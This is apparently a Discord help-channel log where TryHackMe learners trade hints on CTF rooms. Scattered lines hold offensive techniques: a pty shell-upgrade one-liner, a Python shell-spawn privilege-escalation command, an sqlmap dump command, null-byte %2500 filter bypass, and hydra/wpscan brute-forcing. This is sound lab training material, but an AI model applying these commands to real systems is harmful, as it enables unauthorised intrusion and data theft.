Doublecheck the options on the share

dry gate
ripe hedge
#

Ah ok

sick eagle
#

Upload vulnerabilites Task 4. Photo uploaded, name changed. Can't get the flag though. Wondering if I'm renaming in the wrong place?

open walrus
#

So there's a missing line in MetaSploit exploit where it should return user name. What's going down?

latent arch
#

am i supposed to be stuck in /bin on the "CC: Pen Testing" task 10 room?

#

nevermind it just worked finally after restarting msfconsole

quick grove
#

Hello, can I have a hint on the password of local account for Pickle Rick challenge question #2 please?
(can share what I got so far in pm)

marsh cosmos
#

I've been at this GoldenEye challenge most of the day. Seems like I'm just not having any luck with my wordlists. Using what is included in SecLists

spice shard
quick grove
#

@spice shard Should I post it here?

spice shard
#

Yeah you can.

#

Though you don't need to find password, but you can use other commands (which will not get filtered) and then read the stuffs on the console itself.@quick grove

quick grove
#

@spice shard will have a look, thanks

green minnowBOT
#

Gave +1 Rep to @spice shard

kindred narwhal
#

hey, what is the status of the tickets for the blog posts from the PreSecurity path? Did my post got ovelooked? anyone got the tickets already?

white salmon
#

Kinda feelsbadman but oh well

#

It was fun making a blog post regardless

marble pawn
#

anyone knows what happed to 403 fuzzer ?

glossy onyx
spice shard
#

Where you stuck at? Please be specific.

analog seal
#

I am so lost. Cannot figure out the answer:

https://tryhackme.com/room/mitre

Where can you find step-by-step instructions to execute both scenarios?

6 & 7 Letters.

From my point of view, the answer would be github but i am not sure what the second word would be.

spice shard
#

Which Task and which question?

analog seal
#

Found the Answer, barried in the deep web. I would recommend to implement a Hint for this one.

#

Task6, Last Question

sage fractal
#

a little help pls , i am trying to determine when will the crontab on the deployed instance will run on this machine , i am entering the answer 5 am on Monday but its not accepting

#

the values are 0 5 * * * 1 which means 5 am on Monday

#

0 5 * * 1

spice shard
#

Look at last line..

sage fractal
#

oh so i am supposed to look into that file thanks

spice shard
#

Nope.

#

What you are looking is on the Last line itself.

sage fractal
#

where is it ?

#

i went to the directory and their was no such process as processes.sh

#

i opened it and revealed a gflag

#

flag

#

but nothing else

spice shard
#

It starts with @

sage fractal
#

what does that means ?

#

i want the time of that

spice shard
#

Question is simply asking you that when will the cronjob normally run on the deployed instance.

sage fractal
#

is that a username

#

yes and then the narrator opened the crontab using crontab -e

#

but he has a different question for him

spice shard
#

You will see something like this - @ followed by r....

sage fractal
#

wel yes thats the answer but it was so confusing , i thought it was asking about the time and not the process

#

it should have asked at what stage will it run

#

it felt like it was inquiring about the time

spice shard
#

Well, if in future you get stuck on a particular question then your best bet would be to carefully see the Answer tolerance of THM and then try to guess what will be the answer.

#

You should start thinking out of the box too. Will be helpful a lot.

sage fractal
#

it was asking "when" so i immediately opened the crontab generator website to verify the time . i thopught it was the time it was after so i kept looking for the time , which says 5 am on Monday

#

but through the answer it seems like it was talking about the stage of the process

#

what is a repository ?

spice shard
#

It can be confusing at starting but now you know. Thinking about every other possibilities is a good thing.

sage fractal
#

@spice shard what happens when a software developer wishes to submit a software he created ? does it goes into the /etc/apt directory ?

#

is that it ? and everyone would be able to see it ?

spice shard
#

Everyone can see your submitted package if it gets approved.

sage fractal
#

but where is it submitted ?

#

within the apt folder ?

#

and its done ?

#

everyone will able to see that ?

#

no uploads on any website ?

spice shard
#

Dunno where to submit but you can research on google and all your questions.

sage fractal
#

ohk thanks

hidden geode
#

Hiya, at the last task of https://tryhackme.com/room/ccpentesting and stuck on privilege escalation. connected as a normal user and moved ssh into a meterpreter session. got 3 possible exploits in metasploit, but none will work.. Kinda stuck at finding more

#

anyone can push me out of my boxthinking πŸ˜‰

tough rapids
#

@simple mountain ^

#

It's almost in every channel. pikapika

sweet relic
#

Login with Steam? This doesn't seem legit...

limber bear
#

I mean ESPECIALLY here I'm not clicking any links... :)))

#

I jest. But does that happen often?

sweet relic
#

Me neither. I'm just copying and opening it on a throwaway server

sweet relic
limber bear
#

Hmmm. Interesting move then.

sweet relic
#

Did he just...delete his message!?

tough rapids
#

Mods, yes

sweet relic
#

Good mod πŸ™‚

limber bear
#

Nice

magic owl
tough rapids
magic owl
spice shard
#

Sushonkpeace

tawny yoke
#

does anyone know if 'Holo' is working?

#

because it seems like the web page is down

spice shard
white salmon
#

Can i get hint for Crocc Crew?

white salmon
#

really thnx i didnt realize that πŸ˜„

upbeat temple
#

guys i'm doing the vulvuniversity room, but i can't do the privilege escalation

#

i should use systemctl but is my first time and i don't know how to use

upbeat temple
green minnowBOT
#

Gave +1 Rep to @heady tiger

upbeat temple
#

I can not make it, everythings i try to do responde me: no tty present and no askpass program specified

#

i need to change the password, and for do that i need to make a privilage escalation with systemctl, but i can't make it

white salmon
#

python -c 'import pty;pty.spawn("/bin/bash")

upbeat temple
#

I don't know what Is this

spice shard
#

I can not make it, everythings i try to do responde me: no tty present and no askpass program specified

Here you are talking about the non-functional or unstable shell with no job controls, no auto complete, no clearing screen with clear command, etc. That's where you have to improve your shell.

upbeat temple
ruby bay
#

Hi. I am doing the NSE Scripts: Working with the NSE, I am need a hint for the following Answer the questions below
What optional argument can the ftp-anon.nse script take?

Answer format: *******

spice shard
upbeat temple
#

@spice shard metasploit

#

Sorry my phone have autocompleted the Word

spice shard
# upbeat temple <@627529468205858857> metasploit

See if you get a shell with netcat (let's take simple example), then you would probably have under-privilege shell ( non-functional, no auto complete, no jobs control, no clearing screen, get's exited due to pressing CTRL + C, etc ). Now, here you need to improve this shell in order to get a fully functional shell. And there are some commands using which you can achieve this.

But if you think of metasploit, which has many modules and different type of payloads to get different shell, for eg, meterpreter shell, unix shell, etc. If you consider a case where you have a unix shell (in metasploit) and you need to get the terminal first (or maybe it is not necessary, as per the need basically), or you can start a new listener on another terminal and using one-liner bash shell command, you can catch the connection on that listener and there you need to improve the shell again to make it fully functional.

sturdy hearth
spice shard
#

Ohh thanks very much, infloop. I will have a look at it.

upbeat temple
green minnowBOT
#

Gave +1 Rep to @spice shard

viral thistle
#

its also takin long for me im on 612 😩

rare sage
#

Im doing linux fundamentals part 3
It said me to start machine and then click on attack box , i did the same

Then its saying to use some credentials to login .....from where I can login , no option is showing in machine..

Coming in next tast : its saying edit task3 located in tryhackme's home directory using nano..

I cant see where is nano , i cant see where is home directory

I think i have deployed machine wrong

#

How to deploy machine in a right way -_-

wintry yarrow
#

Task 2 says deploy machine. And nano is a text editor. Have you read the tasks?

spice shard
tardy pendant
#

Hey peoples. Im currently trying to dump some SQL table for the CC Pentest - Task 18.
Im using ||sqlmap <ip> --forms --dump|| leaving the POST data be filled with random values. With this outcome:

#

The info in the feed shows a flag column, but the table visualization is showing <blank>

#

Any tips on what may be the problem?

high spire
#

hello, im on the" simple ctf" i found t ||CMS Made Simple < 2.2.10 - SQL Injection, when i try to execute the script python (with the url to /simple) i have an "ImportError: No module named termcolor" while pip tell me "Requirment already satisfied"||

spice shard
#

Are you running the exploit with python2 ?

high spire
#

i running with python, python2, python3 it's the same

spice shard
#

Termcolor module error with python3 also?

tough rapids
#

Yep same happened to me also when dealing with term colour... Idk what to do and left it

high spire
spice shard
#

You can convert the exploit to python3. It should be in python2 afaik

high spire
#

how convert to python3 it's easy ?

sturdy hearth
spice shard
#

That's it.

sturdy hearth
#

Yeah, that is basically it for simple scriptsπŸ˜‚

high spire
#

thanks you i will try both

oblique plank
#

just an fyi, i ran that room a few days ago. converting to python3 didn't help me solve it

#

i'd also be interested in the solution if you've found it @high spire

high spire
#

ok

#

^^

#

i try some things but now i have no error

#

@oblique plank

oblique plank
#

so you execute this and it works? No errors?

high spire
#

yes with python3 no error

oblique plank
#

nice!

high spire
#

yes

#

what wordlists you use ?

oblique plank
#

|||I believe rockyou.txt|| I'm sure you could use a smaller wordlists

high spire
#

yes it's a bit long

high spire
#

@oblique plank you have no problem with this script?, me i had to change "TIME = 2"

limber bear
#

Anyone able to help me out? I'm doing "Network Services" (machine polosmb3) and it says "do any nmap scan you like, how many ports are open'. What machine though? Is it my own?

I might have my machines mixed up again but I'd like to know for clarity's sake.

left thunder
limber bear
#

Hmmm, I started the machine in task 3 like 3 times, but it just gives me the attackbox. Maybe I should try turning it off and on again.

#

But thanks! I'll make sure that's the case.

left thunder
limber bear
#

I have that as well.

#

And I tried restarting the machines multiple times but I still only get the standard attackbox

#

It's just done loading, gonna try again.

#

Ah

#

There we go!

left thunder
# limber bear And I tried restarting the machines multiple times but I still only get the stan...

Well I think we are somehow misunderstanding. If you press the "Start machine" button, it should only start the target machine like in the picture above. If you press the "Start Attackbox" button on top of the page, it's starting the attackbox. So if you have the target started and if you have your attackbox started then everything is fine. Then you have to use your attackbox to conduct an nmap scan on the target machine (10.10.166.66)

limber bear
#

Hmmm, last time I tried the target IP and it gave me a weird result, so might be both I misread the IP and the interface of these boxes is still some getting used to.

#

It worked after a reset so I guess it had something to do with me starting the wrong machine (again).

#

Thanks!

left thunder
limber bear
#

Lmao I'll get there. Most of the time when I get stuck on assignments it's because I'm reading numbers wrong or doing some other frickery with the VMs.

mellow geode
#

Curious if someone could take a quick look at a screen shot from Mr Robot to see if there's something messed up with my command? I was able to utilize one utility to find a password but I was initially trying a different and it wasn't working. If it's ok to paste here I will but I didn't want to spoil anything for anyone

magic owl
#

you can mark it as a spoiler

#

||spoiler||

mellow geode
#

Ok will do when I get back home. Thanks.

glacial gust
#

you need to verify to post screenshots

#

!docs verify

proud scarabBOT
mellow geode
#

||OK, so hydra worked to find the username, but would not work for the password. WPSCAN worked for the password but I was trying to figure out why my hydra wasn't working||

#

There sorry the first message only marked the screen shot as spoiler

mellow geode
#

MrRobot

true slate
#

What password list are you using?

mellow geode
#

initially I was using the one found on the box which contains the correct password. I created a temporary list with the correct password just to test out why the one tool wasn't working right

true slate
#

so you have checked ||robots.txt|| correct?

mellow geode
#

yup, that's where I got my password list

true slate
#

Okay just confirming so I didn't spoil anything

mellow geode
#

I've finished the box, I just cant figure out why that one step, the one tool doesn't work right

true slate
#

ah okay, maybe try recopying the response with burp

#

ive had issues with that before with hydra

#

id also take away -t

#

ive had it skip the right password before when I tried to push it too hard id say max is probably 16 that I would do personally

mellow geode
#

let me spin it back up and see

mellow geode
#

So I pulled a new ||fsocity.dic|| and trimmed duplicates, got a new burp request, set up the attack again without the -t still doesn't work. I really think something is wrong with my command for some reason, I'm think it's something to do with the 3rd string telling it what to look for

true slate
#

if in the error message it has the word incorrect just change it to that

#

instead of that long string at the end, could be looking for exact string and its messing up there but if it only has to look for the word incorrect it could be more reliable

mellow geode
#

nope, that doesn't work either.. meh so frustrating. Might just have to proxy ||hydra|| and review all the requests and responses to see what's going on

sacred hinge
#

I need a hint on Boiler CTF stuck on question "
Keep enumerating, you'll know when you find it."

grand idol
#

Hey everybody. I recently solved Super-Spam and there is one nagging question I have on what might have been an alternate path. ||Has anyone figured out if its possible to decode the 802.11 frames in SamsNetwork.cap in wireshark using the wifi password recovered using aircrack-ng? I tried using the 'Protocol Preferences' to set the decryption key (using wpa-pwd), but it didn't work. ||

rare delta
#

@jaunty geyser did you solve the problem with the payload I have the same issue

lavish solstice
#

Room:Upload Vulnerabilities
Task: Challenge
The custom wordlist contains characters from AAA to ZZZ, I know we've to use it w gobuster but what exactly does it do?

quick furnace
#

Anyone who has solved the Metasploit (https://tryhackme.com/room/rpmetasploit) task 6 and beyond, kindly help... The ps command is not revealing anything related to spool, on both the exploit machine console or in the usual msf6 console... I understand that the room is using msf4-5, but is there a drastic difference? I searched the net but found a completely answered walkthrough, which I don't want. I want guidance on this, please help by DM. I have successfully finished all the previous tasks.

mellow geode
#

Is this a known bug in retro? It will not let me select anything in order to proceed

dry gate
#

try that :o

#

I think I used msf5 but I don't know if that changes anything

quick furnace
dry gate
#

hmmm

#

lemme try and replicate it πŸ€”

spice shard
mellow geode
#

@spice shard the problem is it wouldn't let me, apparently it's a known bug you have to initialize IE and Chrome before trying which I hadn't done. Restarting the machine didn't fix it either so I just got system a different way

spice shard
#

Uhh.. Err.. Dunno, but it's good you got it. (:

#

Which Task and which question?

rare delta
#

@jaunty geyser can I dm please I'm stuck

quick furnace
# dry gate hmmm

sure boss, reply to me in pvt so we can discuss w/o spoilers for others πŸ™‚

jaunty geyser
jaunty geyser
#

Hi guys! Please tell me if there should be a mssql server in the ustoun room?

fresh zephyr
#

Hey everyone, quick question regarding attacktive directory room by spooky - task 5. I get an error message when trying to request a TGT from Kerberos by using Impackets GetNPUsers.py. It says "service not known" - even though I entered the same as in the writeups - where did I made a mistake?

white salmon
quick furnace
#

Hello, I want to know more about the Null Byte poisoning thing employed in the OWASP Juice Room... %00 is the null byte, %25 is '%' in ascii... what is the %2500... is it becoming "package.json.bak%00.md"... but then how is it downloading, there is no file that matches with the required "package.json.bak.md"... Can somebody please DM if it requires lot of discussion?

dry gate
tulip mural
# quick furnace Hello, I want to know more about the Null Byte poisoning thing employed in the O...

There is a file named package.json.bak which can not be downloaded because we are only allowed to download pdf and md.
So we insert a null character. Since we are inserting it in url we use its unicode which is%00. Aftet url encoding it becomes%2500 (%25 for the % and 00 remains same).
We insert it at the end of the file name and add md extension which we allowed to download.
Think of null byte as commenting out with # or -- in sqli

ripe hedge
#

The null byte acts as a string termination character, meaning that the parser interprets the %00 as the end of the string

#

Ok wtf was that autocorrect?

naive pumice
#

Hello anyone has solved the Uranium CTF ?

obtuse gust
#

Hi, i have a question for the tmuxremux room, somebody up with a hint?

How can you run the desired plugin after loading it?

oblique plank
#

@obtuse gust

obtuse gust
lucid fiber
#

What is a Privilege Escalation Checklist? I mean I've looked it up on Google but I still don't get it πŸ˜…

#

Is it like a checklist of ALL Privilege Escalation tools?

left thunder
lucid fiber
#

Alright basically it consists in choosing the right method to exploit something to escalate privileges

#

I get it

stuck fractal
#

The idea is that it provides a methodical set of items to work through in order

lucid fiber
#

Alright thanks man

limber bear
#

@ripe hedge what's the smallest hint you can give me : ))) like absolute minimum. I think I need a push in the right direction

#

Wait hold on

#

I made some progress

#

Will poke you if I'm stuck again

#

Nevermind, that wasn't it : ((

limber bear
#

I can't find anything and I feel like I'm gonna stay stuck. I'm absolutely sure I'm looking in the wrong direction. I'm going to bed now but I'll try again fresh tomorrow!

ripe hedge
#

There's something exposed that shouldn't be

limber bear
limber bear
green minnowBOT
#

Gave +1 Rep to @ripe hedge

ripe hedge
#

Good hunting

hidden geode
#

Anyone can give me a push in the right direction on task 8 of "Upload Vulnerabilities"?

#

trying to find the upload dir, but havent succeeded till now...

left thunder
hidden geode
#

I seem to have uploaded the reverse shell, but the upload dir is not findable by gobuster... so there is where i got stuck

#

also been scanning throught the js and css but cant find a path there either till now

left thunder
hidden geode
#

only folders i found are assets, privacy and server-status till now. I can browse the assets folder. rest is 403

#

the task specically tell that the dir is randomised

left thunder
hidden geode
#

ah crap. you are right πŸ™‚

left thunder
#

πŸ˜„

hidden geode
#

got the flag... just saw the 403 and gave up on the dir without checking

#

thanks @left thunder

green minnowBOT
#

Gave +1 Rep to @left thunder

left thunder
kind swan
#

Hey, I am stuck in hololive task 28.. May I have a hint pls

lucid fiber
#

Hello my fellow hackers!
I'm having fun on the RootMe CTF right now and I need some help πŸ˜‚
Basically I'm almost at the end so in the "post-exploitation step"
I already set up a reverse shell and I discovered that Python is the vector to escalate privileges to the root BUT I run the following script python -c 'import os; os.system("/bin/sh")' but it didn't spawn me a root shell tho

#

Any hints guys?

#

Here is the room's questions

#

I also tried python -c 'import os; os.system("cd /root")'

spice shard
#

Use full path of binary.

lucid fiber
#

Already done man

#

same result

spice shard
#

Look for Gtfobins in browser and search for python there. (:

lucid fiber
#

already done too man lol

#

maybe I'm missing a detail

spice shard
#

What is the command you issued (with full path of binary)?

lucid fiber
#

/usr/bin/python -c 'import os; os.system("/bin/bash")'

#

I wanted to spawn a root shell

spice shard
#

Well gtfobins has slightly different command.

lucid fiber
#

oh

#

yeah I saw that

spice shard
#

So you should use that and execute it to become boss.

lucid fiber
#

I'mma try this again

spice shard
#

Cool, glhf

lucid fiber
#

thanks man

spice shard
#

Infloop - Isn't it a hint roomπŸ˜… ?

sturdy hearth
#

Oh, sorry buddy.
I have deleted the spoilerπŸ˜…

spice shard
#

Haha, no problem. ((:

lucid fiber
#

If I answer a question correctly on the first try, I get 80 points right?

left thunder
lucid fiber
#

oh

#

I didn't really get it how it works tho

left thunder
# lucid fiber I didn't really get it how it works tho

Have you already read that? https://docs.tryhackme.com/docs/rooms/how-points-work/

So the amount of points depends on if it's a CTF or a walkthrough. Also it depends on the relase date and the difficulty.
But what I noticed, that if it's a walkthrough and it's more then a month old I receive 8 points per question, regardless if it's the first or 15th try to answer it.

Completing rooms gets you a certain number of points. A breakdown of how questions are scored as follows:

lucid fiber
#

What? It means that VIP rooms doesn't increase the rank and level?

fickle delta
#

hey, did anyone do pythonbasics room? In the 6th task I did the code correctly, but I don't get the flag

serene badger
#

i have a question about linux fundamentals room 3, i started the python webserver in the box(task 4), but this step i cant get right

Download the file http://10.10.235.125:8000/.flag.txt onto the TryHackMe AttackBox

fresh zephyr
left thunder
serene badger
#

ah the second one is probs the problem

left thunder
serene badger
#

Connecting to 10.10.235.125:8000... failed: Connection refused.

fickle delta
serene badger
#

in a new tab

fickle delta
#

that was the issue

left thunder
fickle delta
green minnowBOT
#

Gave +1 Rep to @left thunder

left thunder
serene badger
#

jup

#

i got the flag by watching the walkthrough and i get how it works but its curious it doesnt work for me

left thunder
serene badger
#

yes

left thunder
serene badger
#

jup

#

just ctrl+c

left thunder
# serene badger yes

I would anyways suggest to verify so you can send screenshots in all the channels, that would make things more easy πŸ™‚

#

!docs verify

proud scarabBOT
serene badger
#

i believe i already verified

#

lemme check

left thunder
#

No you are not πŸ™‚

serene badger
#

oh alright then lemme fix that

#

done

left thunder
# serene badger done

Great, so maybe send a screenshot of your whole screen to see the python server and where you tried to download the file

serene badger
#

this is how i set up the server

#

and this is what i tried

left thunder
#

Could you send me one more screenshot for me to see the .flag.txt file

serene badger
#

what you mean?

#

i cant download the file thats the problem lol

left thunder
#

On the server where you have started the python webserver, do a ls -al in the folder where the .flag.txt file is located

serene badger
#

so cd / should fix it?

#

no wait its still at task3 dir

left thunder
# serene badger

You sure you are using the right IP, so the one from the target machine and not your THM IP?

serene badger
#

jup

left thunder
#

And then do a ls -al again

serene badger
#

thats the same dir

#

see screenshot for the ls -al its the same dir

left thunder
serene badger
#

thanks man

left thunder
# serene badger thanks man

Mh, seems to work just fine for me. I would restart the target machine and give it one more try. Can't see anything that you are doing wrong.

serene badger
#

im gonna just continue the rest but thanks alot dude πŸ™‚

left thunder
knotty gazelle
#

Hi guys ! I'm currently learning on the Pre-Security path and wanted to try the regex room (https://tryhackme.com/room/catregex)
I'm currently stucked at the last question of Task 4. I've tried \.*\S+ and \.*\w+, but neither of these expressions is the answer (even though I guess they work). So i think there is a better solution which I can't think of but I don't understand which one. Any hint on this for a newcomer ? 😁
(SOLVED thanks)

next grove
#

Hey, I'm a lil stuck on this room...Someone i can Private chat on the same?

#

I'm following the instructions in the walkthrough then i get this error..What could be the problem?

sweet shuttle
#

pm

quick furnace
tulip mural
quick furnace
#

I didn't exactly save it, I opened it from Firefox to Sublime... And I don't understand... .md is commented, then how does it allow us to download a .bak file which is not allowed...?